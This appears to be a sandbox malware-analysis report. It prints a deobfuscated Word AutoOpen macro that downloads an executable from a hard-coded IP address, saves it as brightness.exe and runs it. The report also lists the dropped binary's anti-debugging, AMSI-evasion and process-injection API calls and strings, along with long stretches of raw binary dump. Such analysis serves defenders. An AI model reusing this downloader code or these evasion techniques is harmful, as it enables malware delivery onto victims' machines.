???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00?
Shell	Shell(""brightness.exe"") -> 2072

Strings	Decrypted Strings
"M""S""X""M""L""2"".""S""er""ver""XM""LH""TTP"
"Ad""od""b.S""tr""ea""m"
"h"
"t"
"t""p:/""/147.124.216.113/image"
"."
"e"
"x"
"e"
"GET"
"brightness"
"."
"e"
"x"
"e"
"""brightness"
"."
"e"
"x"
"e"""

Line	Instruction	Meta Information
9	Sub AutoOpen()
11	Dim xHttp	executed
16	Set xHttp = CreateObject("M" & "S" & "X" & "M" & "L" & "2" & "." & "S" & "er" & "ver" & "XM" & "LH" & "TTP")	CreateObject("MSXML2.ServerXMLHTTP") executed
18	Dim bStrm
20	Set bStrm = CreateObject("Ad" & "od" & "b.S" & "tr" & "ea" & "m")	CreateObject("Adodb.Stream") executed
24	Dim nirm1
25	nirm1 = "h"
26	Dim nirm2
27	nirm2 = "t"
28	Dim nirm3
29	nirm3 = "t" & "p:/" & "/147.124.216.113/image"
30	Dim nirm4
31	nirm4 = "."
32	Dim nirm5
33	nirm5 = "e"
34	Dim nirm6
35	nirm6 = "x"
36	Dim nirm7
37	nirm7 = "e"
41	Dim plpl
42	plpl = nirm1 & nirm2 & nirm3 & nirm4 & nirm5 & nirm6 & nirm7
45	xHttp.Open "GET", plpl, False	IServerXMLHTTPRequest2.Open("GET","http://147.124.216.113/image.exe",False) executed
46	xHttp.Send	Send
52	With bStrm
53	. Type = 1
54	. Open
55	. write xHttp.responsebody	IServerXMLHTTPRequest2.responsebody() -> ?P\x02\x00\x04\x0f?\x00\xfffd\x00\x00\x00@\x1a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00????????????????4???????????\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x00O ??\x00\x00\x00\x00\xfffd?c??\x06? \x00\x00?\x06?\x00?\x06\x00@?\x00?\x00\x04\x00\x00\x00\x04\x00\x00\x00?\x12?\x00\x00\x00\x02\x00\x00\x10?\x00\x00\x10?\x00\x00\x00\x10\x00\x00\x00\x00\x00?\x07?\x00 \x08? \x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00?\x07?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00??t\x00?\x06?\x00?\x06?\x00\x00\x00\x00\x00\x00\x00 ????\x00?\x00?\x06?\x00?\x06\x00\x00\x00\x00\x00\x00 ???a\x00?\x00?\x06 \x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x00?\x00?\x07\x00\x00?\x06\x00\x00\x00\x00\x00\x00\x00????\x00?\x00?\x07?\x00?\x06\x00\x00\x00\x00\x00\x00@???\x00\x004\x00?\x07\x00\x00?\x07\x00\x00\x00\x00\x00\x00\x00????\x00\x18\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@????\x00?\x00?\x07?\x00?\x07\x00\x00\x00\x00\x00\x00@???c\x00? \x08? ?\x07\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00?\x12\x00\x00?\x11\x00\x00\x00\x00\x00\x00@?\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@????U\x00\x00\x01\x00?@??????@?@???\x01\x00?\x00??@?????\x00?????@???\x01\x00?\x00??@???\x03\x00?\xfffd??@?????\x05\x00????@?????@???????@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x04\x00\x00\x00?@?@?@?@?@?@?@?@?????@??????\x00\x00\x00????\x00?@??????\x00\x00\x01\x00\x00\x00?\x00\x00\x00????\x03??@???????A?\x02\x00\x00\xfffd\x00\x00???????????P????P????P???????A\x00\x00\x00\x00\x00?\x00\x00\x00???\x00\x00\x00?@?@?@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00?@\x0c\x00?@?@?@?@?@?@?@?@?@????????????G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G???G????\x00?????I??????????G???G???G???G???W\x00?????????????????`????????\xfffd????????????????t???@?????????@???????????????@?????????????????????@???????????????@???????????????????????????????????????@???????????????????????????????????????????????????@?C????I????????????????@?A???I??????????????????G??????????G????????????\x00???\x03????\x03???G????????????G?????\x00????G?\x00????????G???????????-?????????\x0b???????????\x00?????G??????G?????????h\x10?\x00\x14j?????????????G????\xfffd?????\x02\x00??????????G??????????????G????????????????????G????????????\x10\x01???\x00??h??j???????????????G??G??G?????\x00????????????????h????????????????\x00?????? ???G??\x00???????F????????????????f??????A????C??\x03?????????\x03??\xfffd\x01?????\xfffd\x01?????\xfffd\x01?????j???A\x00??????????????G??A\x00???G?j???A\x00???G????????u??G????\x00\x00?????????G??????????????????G??????\x01???????????????????G????G????\x00??????G??G???????????G???????????G????\x01\x00????????????\x03????\xfffd\x01?????????\xfffd\x01???????????????\x01??\x00?\xfffd??????????????????G?????????????????????????????G???????G??G??????????\x00???????????????????G????????????????????\x00??????????????\x00??????????????????\x00??????????????????????????\x03?????????????????????????\xfffd\x01?????????\xfffd\x01?????????????\xfffd\x01?????????\xfffd\x01??????????????\x00?????????\x00????????????\x13?????????????\x00?????????\x00???????a??\x0b????????G?\x13??????????\x00h?????????????\x13????\x02\x00??G?\x13??G??G???????????????????\x00????????@\x00????????????????????????? ???????????????????????????????????\x02????l??????\x00??????????\x00???\x00?\xfffd\x00?\x0b??\x00?\xfffd????????\x00?\xfffd\x01??????j???\xfffd\x01????????????\x00????????????????jU??\x0b???????????\x00????????G????????????????????????????\x00??????\x00???\x00?\xfffd\x01???????????\xfffd\x01?????????????\x00????????????\x00??????????Q?????\xfffd\x00%????????????????????\x0b?c????????\x00???????\x00??A????????????????????????????????????\x00??????A??????????????????????????????????????????????????????????????????@?x???????????\x04???????????????????????????@??G????????\xfffd???????????????G???@????????????????????????????????\|????????????????????????????????????????????????????????????????????????????????\xfffd?????????????\x7f???????????????????????????\x1f???????????????@??????\x0c?s????????????????????????????????????\x00?????\xfffd????????\xfffd\x10?????????????????u?????????R???z?????????@????????\x00\x01????H???????????G????????????????????G?????????\x00??h\x10?\x00\x01j????G??G???@??????????????G???G???????????\x00?????G????^?????????????????????7???????\x00?????????????????????\xfffd?????????\xfffd\x00???\xfffd??\x00???????\x00??????????????\x00???A\x00?\xfffd\x00?????????\x00?????????????????????????????????????????\xfffd???8??\x00??\x02\x00???????\xfffd\x00??\xfffd\x00??????????????????????????\x00?????????????????\x01?\x0b??????\x00?\x0b??????????G?\x00????????????\x00???\x00???????????\x00???????????????\xfffd????????????????????????????????????????\xfffd???????????????????G?????\x00??????\x02???\xfffd??????????(\x00???????\x00???????????????\xfffd???????\xfffd?\x00??????????\x01?>?\xfffd\x00??????@?\x00???????????\xfffd?f?f?????????f?f?f??????????@?\x00???????????? ??K??????\x07\x00???????@?\x00????????????\x00???????????f?f?f???????????????????????\x00???@????????\xfffd???????????????@?\x00??????????????\x00\x00?????????? ????????????????????\x03\x00????-\x00??????j??????\x00????????????????????\x00\x00??????????????????? ???\xfffd\x00\x00???n???\x00?????????????????????????????\xfffd\x00\x00?\x00???????????\x00????????\x00???????????????????????????7\x00???;???@??????????\x01\x00??????\xfffd\x00%????\x0b???\x00?\x04?????\x07\x00???????????????????\x00?\xfffd?????\x00??s??\xfffd??P\x00???????????%??????????????G?G??G?G\xfffd\x04??G???????????????????@??????G????h?????????7\x00? executed
59	Dim monu1
60	monu1 = "brightness"
61	Dim monu2
62	monu2 = "."
64	Dim monu3
65	monu3 = "e"
67	Dim monu4
68	monu4 = "x"
70	Dim monu5
71	monu5 = "e"
73	Dim monu6
74	monu6 = monu1 & monu2 & monu3 & monu4 & monu5
77	. savetofile monu6, 2
80	Dim parveen1
81	Dim parveen2
82	Dim parveen3
83	Dim parveen4
84	Dim praveen1
85	praveen1 = """brightness"
86	Dim praveen2
87	praveen2 = "."
89	Dim praveen3
90	praveen3 = "e"
92	Dim praveen4
93	praveen4 = "x"
95	Dim praveen5
96	praveen5 = "e"""
101	Dim praveen6
102	praveen6 = praveen1 & praveen2 & praveen3 & praveen4 & praveen5
106	End With
108	Shell (praveen6)	Shell(""brightness.exe"") -> 2072 executed
110	End Sub

Reset < >

Analysis Process: brightness.exePID: 2072, Parent PID: 1892COMMON

Execution Graph

Execution Coverage:	15.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	17.7%
Total number of Nodes:	300
Total number of Limit Nodes:	20

Executed Functions

Function 0284F0A8 Relevance: 243.3, APIs: 11, Strings: 122, Instructions: 10535filesleepCOMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,0285B3D5,?,?,?,000002F7,00000000,00000000), ref: 0284F0E2

Part of subcall function 0284881C: LoadLibraryA.KERNEL32(00000000,00000000,02848903), ref: 02848850
Part of subcall function 0284881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02848903), ref: 02848860
Part of subcall function 0284881C: GetProcAddress.KERNEL32(74AD0000,00000000), ref: 02848879
Part of subcall function 0284881C: FreeLibrary.KERNEL32(74AD0000,00000000,02892388,Function_000065D8,00000004,02892398,02892388,000186A3,00000040,0289239C,74AD0000,00000000,00000000,00000000,00000000,02848903), ref: 028488E3

Part of subcall function 0284EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0284F3CC,UacInitialize,0289237C,0285B40C,UacScan,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanString), ref: 0284EFCE
Part of subcall function 0284EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0284EFE0

Part of subcall function 0284F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0284F034
Part of subcall function 0284F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0284F046
Part of subcall function 0284F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0284F05D

Part of subcall function 02837E10: GetFileAttributesA.KERNEL32(00000000,?,0284FD00,ScanString,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanString,0289237C,0285B40C,UacScan,0289237C,0285B40C,UacInitialize), ref: 02837E1B

Part of subcall function 0283C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029868C8,?,02850032,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession), ref: 0283C2FB

Part of subcall function 0284DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284E0B4), ref: 0284E01F
Part of subcall function 0284DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0284E0B4), ref: 0284E04F
Part of subcall function 0284DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0284E064
Part of subcall function 0284DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0284E090
Part of subcall function 0284DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0284E099

Part of subcall function 02837E34: GetFileAttributesA.KERNEL32(00000000,?,02852E7D,ScanString,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,Initialize), ref: 02837E3F

Part of subcall function 02837FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0285301B,OpenSession,0289237C,0285B40C,ScanString,0289237C,0285B40C,Initialize,0289237C,0285B40C,ScanString,0289237C,0285B40C), ref: 02837FD5

Part of subcall function 0284DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284DFD2), ref: 0284DF3F
Part of subcall function 0284DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0284DF79
Part of subcall function 0284DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0284DFA6
Part of subcall function 0284DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0284DFAF

Part of subcall function 02848798: LoadLibraryW.KERNEL32(bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize,028923A4,0284A774,UacScan), ref: 028487AC
Part of subcall function 02848798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 028487C6
Part of subcall function 02848798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000006A8,00000000,028923A4,0284A3BF,ScanString,028923A4,0284A774,ScanBuffer,028923A4,0284A774,Initialize), ref: 02848802

Part of subcall function 02848704: LoadLibraryW.KERNEL32(amsi), ref: 0284870D
Part of subcall function 02848704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0284876C

Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,ScanBuffer,0289237C,0285B40C,OpenSession,0289237C,0285B40C,0285B764), ref: 02854DEB

Part of subcall function 0284DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0284DEA0
Part of subcall function 0284DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0284DEF2), ref: 0284DEB6
Part of subcall function 0284DE78: NtDeleteFile.NTDLL(?), ref: 0284DED5

MoveFileA.KERNEL32(00000000,00000000), ref: 02854FEB
MoveFileA.KERNEL32(00000000,00000000), ref: 02855041

Strings

NtDeviceIoControlFile, xrefs: 0285A4E4
NtSetSecurityObject, xrefs: 02858DFA
DlpGetWebSiteAccess, xrefs: 0285A045
ScanBuffer, xrefs: 0284F2A7, 0284F5FF, 0284F829, 0284FD90, 0284FE9D, 0284FFB5, 02850389, 02850527, 028506CD, 028507ED, 02850982, 02850A7A, 02850CE3, 02850E89, 02851025, 0285113B, 028511C9, 028514DD, 0285177E, 0285188F, 02851A2C, 02851DD7, 02851EE3, 02852101, 0285221E, 02852539, 028525DA, 0285274E, 0285290E, 02852C30, 02853027, 028532C6, 02853357, 02853711, 028538F3, 02853A67, 02853BEA, 02853C66, 02853E1D, 02854027, 02854285, 028544B7, 028546FB, 02854943, 02854BF9, 02854D5F, 02854EF4, 0285522C, 02855566, 0285587F, 02855BFF, 02855F38, 028561EA, 028563EF, 02856555, 028566C9, 02856745, 028572E8, 02857379, 028577A9, 0285793C, 02857A98, 02857B90, 028580AD, 0285837A, 02858520, 028586AD, 02858841, 028589C0, 02858C37, 02858D2F, 0285914B, 02859424, 02859598, 028597CE, 02859860, 02859B98, 02859F36, 0285A465, 0285AD6B
NtCreateSection, xrefs: 0285AAA9
CreateProcessWithLogonW, xrefs: 0285A598
CreateProcessA, xrefs: 0285A55C
Ntdll, xrefs: 0285A4DA, 0285A4E9, 0285A4F8, 0285A507
MiniDumpWriteDump, xrefs: 02858DD2
VirtualProtect, xrefs: 0285A69E
psapi, xrefs: 0285A552
smartscreenps, xrefs: 0284F932, 0284F965, 0284F998
NtAlertResumeThread, xrefs: 0285A170
FlushInstructionCache, xrefs: 0285A737
lld.SLITUTEN, xrefs: 02853EEC
NtQueryDirectoryFile, xrefs: 0285A4F3
GetProxyDllInfo, xrefs: 0284F40B
CryptSIPGetSignedDataMsg, xrefs: 0284F6DB
VirtualAlloc, xrefs: 0285A638
LdrLoadDll, xrefs: 0285ABA8
EnumServicesStatusW, xrefs: 0285A520
CreateProcessW, xrefs: 0285A56B
mssip32, xrefs: 0284F68C, 0284F6BF, 0284F6F2, 02859CF1
GetProcessMemoryInfo, xrefs: 02859CA7
IconIndex=, xrefs: 02856931
TrustOpenStores, xrefs: 0284F4E4
SxTracerGetThreadContextDebug, xrefs: 02859C41, 0285A911
UacInitialize, xrefs: 0284F36F, 0284FA36, 02850179, 0285418D, 02854603, 02854DFC, 028550B8, 0285546E, 0285595B, 02857471, 02858CB3, 028590CF
NtQuerySecurityObject, xrefs: 0285AB42
URL=file:", xrefs: 028568DB
SLGatherMigrationBlob, xrefs: 0285A977
WinHttp.WinHttpRequest.5.1, xrefs: 02851C1D
[InternetShortcut], xrefs: 028568CC
SLGetEncryptedPIDEx, xrefs: 0285A9AA
SLIsGenuineLocalEx, xrefs: 02859A34
spp, xrefs: 02859C58, 02859C8B, 0285A928
BCryptQueryProviderRegistration, xrefs: 0284F7BD
CryptSIPVerifyIndirectData, xrefs: 0284F6A8, 02859CDA
NtAccessCheck, xrefs: 0285AB75
C:\\Windows \\SysWOW64\\, xrefs: 02853F02, 02854316
NtQuerySystemInformation, xrefs: 0285A4D5
WintrustAddActionID, xrefs: 0284F517
NtQueryVirtualMemory, xrefs: 0285AA10
Advapi, xrefs: 0285A516, 0285A525, 0285A534, 0285A543, 0285A57F, 0285A58E, 0285A59D
Kernel32, xrefs: 0285A561, 0285A570, 0285A5AC
@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%, xrefs: 02853795
NtOpenProcess, xrefs: 02858E0E
sys.thgiseurt, xrefs: 02854300
NtMapViewOfSection, xrefs: 0285AADC
RtlCreateQueryDebugBuffer, xrefs: 0285A23C
EnumProcessModules, xrefs: 0285A54D
ScanString, xrefs: 0284F1DF, 0284F46E, 0284F583, 0284F714, 0284F8A5, 0284FB2E, 0284FC6F, 028501F5, 02850E0D, 02850FA9, 028513E5, 02851600, 0285167C, 02851999, 02851CBF, 02851F88, 028523C5, 028527F6, 02852A06, 02852ABC, 02852DEB, 02852F0D, 028531CE, 02853619, 02854111, 02854587, 0285477C, 02855134, 028552CE, 02855613, 028559D7, 02856076, 0285685C, 028569D3, 02856A8B, 028570F8, 02857592, 028579F9, 0285801C, 02858AC3, 02858EB5, 0285929E, 0285965A, 02859958, 02859D13, 0285A0FA, 0285A2F1, 0285A89B
EtwEventWrite, xrefs: 0285ACA7
http, xrefs: 02851A09
wintrust, xrefs: 0284F4FB, 0284F52E, 0284F561
C:\Users\Public\alpha.pif, xrefs: 02854F6A
dbgcore, xrefs: 02858DD7, 02858DEB
SLLoadApplicationPolicies, xrefs: 02859A67
SetUnhandledExceptionFilter, xrefs: 0285A76A
CryptSIPGetInfo, xrefs: 0284F675
C:\Users\Public\, xrefs: 028535B7, 02855904, 02856B77
UacScan, xrefs: 0284F30B, 0284F9BA, 0284FAB2, 02850081, 02850C67, 02851245, 02851BA7, 028522BA, 028534CB, 02853695, 028537F6, 0285396F, 02853AF2, 02853CC3, 02853DA1, 02853F2F, 0285443B, 028547F8, 02854A2D, 0285570B, 02855C7B, 02855E40, 0285616E, 0285627B, 028564D9, 028565D1, 02857174, 02857516, 0285772D, 028578C0, 02857B14, 02857FA0, 02858129, 02858282, 02858428, 028585B5, 02858749, 028588C8, 02858B3F, 02858FAD, 028591C7, 028593A8, 0285951C, 02859752, 0285A5C2
EnumServicesStatusExW, xrefs: 0285A53E
.url, xrefs: 0285590F
EnumServicesStatusExA, xrefs: 0285A52F
CreateProcessAsUserW, xrefs: 0285A589, 0285A5A7
NtOpenObjectAuditAlarm, xrefs: 02858DAA
D2^Tyj}~TVrgoij[Dkcxn}dmu, xrefs: 0285026B
RtlQueryProcessDebugInformation, xrefs: 0285A502
SLGetGenuineInformation, xrefs: 028599CE
ntdll, xrefs: 02858DAF, 02858DFF, 02858E13, 0285A187, 0285A1BA, 0285A1ED, 0285A220, 0285A253, 0285A9F4, 0285AA27, 0285AA5A, 0285AA8D, 0285AAC0, 0285AAF3, 0285AB26, 0285AB59, 0285AB8C, 0285ABBF, 0285ABF2, 0285AC25, 0285AC58, 0285AC8B, 0285ACBE
C:\Windows\System32\, xrefs: 0284FCEB, 028574EF, 02858237
GET, xrefs: 02851D36
sppc, xrefs: 028599E5, 02859A18, 02859A4B, 02859A7E, 0285A98E, 0285A9C1
NEO.c, xrefs: 02854879
Initialize, xrefs: 0284F17B, 028500FD, 02850291, 0285042F, 028505D5, 0285088A, 02850F2D, 02851369, 02851813, 0285191D, 02852004, 02852336, 02852656, 0285298A, 02852B38, 02852E91, 0285324A, 028553F2, 02855787, 02855B83, 02855D48, 02855FB4, 028560F2, 028562F7, 0285726C, 02857F24, 02858F31, 02859B1C, 02859EBA, 0285A3E9, 0285A7A3, 0285ACEF
HotKey=, xrefs: 02856A65
EnumServicesStatusA, xrefs: 0285A511
OpenSession, xrefs: 0284F117, 0284F243, 0284FBF3, 0284FD14, 0284FE21, 0284FF39, 0285030D, 028504AB, 02850651, 02850771, 02850906, 028509FE, 02850BEB, 02850D91, 028510BF, 028512ED, 02851461, 02851584, 02851702, 02851AA8, 02851B2B, 02851C43, 02851D5B, 02851E67, 02852085, 028521A2, 02852441, 028524BD, 028526D2, 02852872, 02852BB4, 02852D6F, 02852F89, 028530A3, 028533D3, 02853872, 028539EB, 02853B6E, 02853FAB, 02854209, 02854343, 0285467F, 028548C7, 02854AA9, 02854B7D, 02854CE3, 02854E78, 028551B0, 0285534A, 028554EA, 0285568F, 02855803, 02855A53, 02855B07, 02855DC4, 02855EBC, 02856373, 0285664D, 028567C1, 02856957, 02856B07, 028571F0, 028573F5, 0285760E, 028576B1, 02857844, 02857C0C, 02857EA8, 028581A5, 028582FE, 028584A4, 02858631, 028587C5, 02858944, 02858A47, 02858BBB, 02858E39, 02859029, 0285931A, 028594A0, 028596D6, 028598DC, 02859AA0, 02859D8F, 02859E3E, 0285A07E, 0285A275, 0285A36D, 0285A81F, 0285ADE7
ieproxy, xrefs: 0284F3F5, 0284F41C, 0284F44C
DllGetActivationFactory, xrefs: 0284F94E
sppwmi, xrefs: 0285A95B
endpointdlp, xrefs: 02859FC3, 02859FF6, 0285A029, 0285A05C
UacUninitialize, xrefs: 02853152, 0285344F, 02853547, 02853D25, 028543BF
DllRegisterServer, xrefs: 0284F435, 0284F981
SLGetSLIDList, xrefs: 02859A01
DlpGetArchiveFileTraceInfo, xrefs: 0285A012
NtWaitForSingleObject, xrefs: 0285A1D6
C:\Users\Public\aken.pif, xrefs: 02854F85
NtGetWriteWatch, xrefs: 0285A9DD
tquery, xrefs: 02859C25
DlpCheckIsCloudSyncApp, xrefs: 02859FDF
advapi32, xrefs: 02858DC3
WriteVirtualMemory, xrefs: 0285A704
bcrypt, xrefs: 0284F7A1, 0284F7D4, 0284F807, 02859E1C
I_QueryTagInformation, xrefs: 02858DBE
DllGetClassObject, xrefs: 0284F3E4, 0284F91B, 02859C74, 0285A944
psapi, xrefs: 02859CBE
EtwEventWriteEx, xrefs: 0285AC74
OpenProcess, xrefs: 0285A6D1
LdrGetProcedureAddress, xrefs: 0285ABDB
NtOpenSection, xrefs: 0285AA76
@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%, xrefs: 02854C82
kernel32, xrefs: 0285A64F, 0285A682, 0285A6B5, 0285A6E8, 0285A71B, 0285A74E, 0285A781
C:\\Windows \\SysWOW64\\svchost.exe, xrefs: 02853ADC
BCryptRegisterProvider, xrefs: 0284F7F0
RetailTracerEnable, xrefs: 02859C0E
VirtualAllocEx, xrefs: 0285A66B
NtWriteVirtualMemory, xrefs: 0285AC0E
GZmMS1j, xrefs: 0284F0F0
NtReadVirtualMemory, xrefs: 0285AB0F
BCryptVerifySignature, xrefs: 0284F78A, 02859E05
NtOpenFile, xrefs: 0285AC41
DlpNotifyPreDragDrop, xrefs: 02859FAC
RtlAllocateHeap, xrefs: 0285A1A3, 0285A209
C:\\Users\\Public\\Libraries\\, xrefs: 02854F9A, 02854FF0, 02855CEB
FX.c, xrefs: 02854B2F
MiniDumpReadDumpStream, xrefs: 02858DE6
NtQueryInformationThread, xrefs: 0285AA43
FindCertsByIssuer, xrefs: 0284F54A
CreateProcessAsUserA, xrefs: 0285A57A
@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or, xrefs: 028549CC

Memory Dump Source

Source File: 00000008.00000002.2214187643.0000000002831000.00000020.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true

Associated: 00000008.00000002.2214169554.0000000002830000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214280552.000000000285E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214395996.0000000002892000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002986000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.2214441547.0000000002989000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2830000_brightness.jbxd

Similarity

API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows 